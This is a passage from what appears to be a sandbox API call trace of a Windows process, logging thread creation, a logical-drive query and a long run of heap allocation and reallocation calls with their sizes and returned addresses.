RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x6153f0 [0043.290] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a710, lpParameter=0x6153f0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x25c [0043.290] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x613280 [0043.290] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4098e0, lpParameter=0x613280, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x264 [0043.290] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x6152b8 [0043.290] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6152b8, Size=0x20) returned 0x60e9f8 [0043.291] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60e9f8, Size=0x40) returned 0x5ea108 [0043.291] lstrlenW (lpString="ABCDEFGHIJKLMNOPQRSTUVWXYZ") returned 26 [0043.291] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xd0) returned 0x5eabf8 [0043.291] GetLogicalDrives () returned 0x4 [0043.291] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10014) returned 0x617700 [0043.291] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x615198 [0043.291] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x615198, Size=0x20) returned 0x60e7a0 [0043.291] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60e7a0, Size=0x40) returned 0x5ea618 [0043.291] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5ea618, Size=0x80) returned 0x614a68 [0043.291] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x614a68, Size=0x100) returned 0x615fd0 [0043.291] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x615fd0, Size=0x200) returned 0x615fd0 [0043.291] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x615fd0, Size=0x400) returned 0x615fd0 [0043.291] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x615fd0, Size=0x800) returned 0x627720 [0043.291] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x627720, Size=0x1000) returned 0x627720 [0043.291] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10000) returned 0x628728 [0043.291] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x615360 [0043.291] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x615300 [0043.291] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4) returned 0x613180 [0043.291] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x6153a8 [0043.291] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x4) returned 0x6132f0 [0043.291] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x615420 [0043.291] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6132f0, Size=0x8) returned 0x613270 [0043.291] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x615318 [0043.291] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x613270, Size=0x10) returned 0x615240 [0043.291] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x615330 [0043.291] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6153c0 [0043.291] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x615240, Size=0x20) returned 0x60ea98 [0043.291] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6152a0 [0043.291] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x613360 [0043.291] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xe) returned 0x615408 [0043.291] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xe) returned 0x615438 [0043.291] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60ea98, Size=0x40) returned 0x5ea390 [0043.291] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xe) returned 0x615450 [0043.291] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xe) returned 0x6151c8 [0043.291] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xe) returned 0x6152b8 [0043.291] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xe) returned 0x615168 [0043.291] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x615198 [0043.291] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6152d0 [0043.291] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x6132f0 [0043.291] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6153d8 [0043.292] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5ea390, Size=0x80) returned 0x614848 [0043.292] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6151e0 [0043.292] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6151f8 [0043.292] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x615240 [0043.292] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x615258 [0043.292] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6154e0 [0043.292] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x615510 [0043.292] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6154f8 [0043.292] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x613290 [0043.292] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x615498 [0043.292] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x615528 [0043.292] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x615468 [0043.292] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x615480 [0043.292] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x6154c8 [0043.292] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6154b0 [0043.292] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x638868 [0043.292] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638988 [0043.292] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x614848, Size=0x100) returned 0x615fd0 [0043.292] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6387c0 [0043.292] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638880 [0043.292] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638928 [0043.292] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x638958 [0043.292] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638970 [0043.292] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638808 [0043.292] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x6131f0 [0043.292] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638940 [0043.292] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638850 [0043.292] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6389b8 [0043.292] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x6) returned 0x613370 [0043.292] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638a00 [0043.292] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6389a0 [0043.292] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x6131b0 [0043.292] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638838 [0043.292] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6389d0 [0043.292] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x6389e8 [0043.292] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638898 [0043.293] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638a18 [0043.293] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6388e0 [0043.293] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xe) returned 0x6388b0 [0043.293] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6387d8 [0043.293] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x6388c8 [0043.293] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6388f8 [0043.293] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638910 [0043.293] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638a30 [0043.293] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638a48 [0043.293] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x613190 [0043.293] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638760 [0043.293] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6387a8 [0043.293] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638778 [0043.293] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638790 [0043.293] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x615fd0, Size=0x200) returned 0x615fd0 [0043.293] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6387f0 [0043.293] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x613200 [0043.293] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638820 [0043.293] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638b20 [0043.293] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638d18 [0043.293] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638b68 [0043.293] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638bc8 [0043.293] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638b50 [0043.293] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638c58 [0043.293] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638a60 [0043.293] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638d30 [0043.293] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x638a90 [0043.293] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x638d48 [0043.293] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638b08 [0043.293] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638c40 [0043.293] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x638ca0 [0043.293] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x638b80 [0043.293] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638a78 [0043.294] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x638aa8 [0043.294] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x638ac0 [0043.294] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638ce8 [0043.294] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638c88 [0043.294] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638ad8 [0043.294] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x6132b0 [0043.294] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638c70 [0043.294] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638cb8 [0043.294] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638af0 [0043.294] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x613270 [0043.294] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638b38 [0043.294] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x638cd0 [0043.294] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638d00 [0043.294] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638c10 [0043.294] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638be0 [0043.294] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638c28 [0043.294] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638b98 [0043.294] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638bb0 [0043.294] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x638bf8 [0043.294] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x638dc0 [0043.294] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638dd8 [0043.294] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638ef8 [0043.294] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638eb0 [0043.294] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x638ee0 [0043.294] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638d90 [0043.294] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638ec8 [0043.294] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638da8 [0043.294] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638e68 [0043.294] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638f10 [0043.294] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638d78 [0043.294] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638e80 [0043.294] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x613210 [0043.294] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x6) returned 0x613220 [0043.295] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638df0 [0043.295] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638e50 [0043.295] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638e08 [0043.295] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638e98 [0043.295] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638e20 [0043.295] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x638e38 [0043.295] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638d60 [0043.295] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638fb0 [0043.295] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639040 [0043.295] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639058 [0043.295] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x639238 [0043.295] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639118 [0043.295] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639130 [0043.295] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x615fd0, Size=0x400) returned 0x615fd0 [0043.295] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639148 [0043.295] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6391c0 [0043.295] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x6390b8 [0043.295] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638fc8 [0043.295] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639178 [0043.295] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6391d8 [0043.295] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x6391a8 [0043.295] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639100 [0043.295] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639190 [0043.295] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639160 [0043.295] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x6132e0 [0043.295] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639070 [0043.295] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x639088 [0043.295] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639220 [0043.295] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639028 [0043.295] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638fe0 [0043.295] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6390e8 [0043.295] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xe) returned 0x6391f0 [0043.295] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639208 [0043.296] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6390a0 [0043.296] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639250 [0043.296] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638f68 [0043.296] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6390d0 [0043.296] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638f80 [0043.296] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638f98 [0043.296] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x638ff8 [0043.296] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x613250 [0043.296] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639010 [0043.296] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639460 [0043.296] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639448 [0043.296] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6392c8 [0043.296] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639550 [0043.296] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639490 [0043.296] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639400 [0043.296] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639268 [0043.296] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639418 [0043.296] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xe) returned 0x6393a0 [0043.296] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639370 [0043.296] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xe) returned 0x6394a8 [0043.296] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639478 [0043.296] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639340 [0043.296] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639388 [0043.296] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639280 [0043.297] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6393b8 [0043.297] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x6393d0 [0043.297] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6393e8 [0043.297] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639430 [0043.297] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6394c0 [0043.297] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639358 [0043.297] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6394d8 [0043.297] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6394f0 [0043.297] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639538 [0043.297] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639508 [0043.297] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639298 [0043.297] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639520 [0043.297] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6392b0 [0043.297] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6392e0 [0043.297] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6392f8 [0043.297] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639310 [0043.297] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639328 [0043.297] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639718 [0043.297] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6395e0 [0043.297] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x6395c8 [0043.297] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x12) returned 0x5e51f0 [0043.297] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639658 [0043.297] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6395f8 [0043.297] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639568 [0043.297] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639580 [0043.297] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639598 [0043.297] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639610 [0043.297] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6395b0 [0043.297] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639628 [0043.297] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639640 [0043.297] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639670 [0043.298] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639688 [0043.298] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6396a0 [0043.298] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6396b8 [0043.298] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639700 [0043.298] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6396d0 [0043.298] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6396e8 [0043.298] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639968 [0043.298] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639848 [0043.298] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6399f8 [0043.298] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639a40 [0043.298] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x6397a0 [0043.298] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x6397e8 [0043.298] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x6399b0 [0043.298] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xe) returned 0x639818 [0043.298] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x6398d8 [0043.298] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x6132c0 [0043.298] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639878 [0043.298] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x613300 [0043.298] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639a58 [0043.298] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639770 [0043.298] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6397b8 [0043.298] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x639860 [0043.298] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x639a10 [0043.298] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639920 [0043.298] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x639938 [0043.298] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639890 [0043.298] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639980 [0043.298] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x639998 [0043.298] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639a28 [0043.298] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x6398f0 [0043.299] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xc) returned 0x6398c0 [0043.299] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639908 [0043.299] RtlAllocateHeap 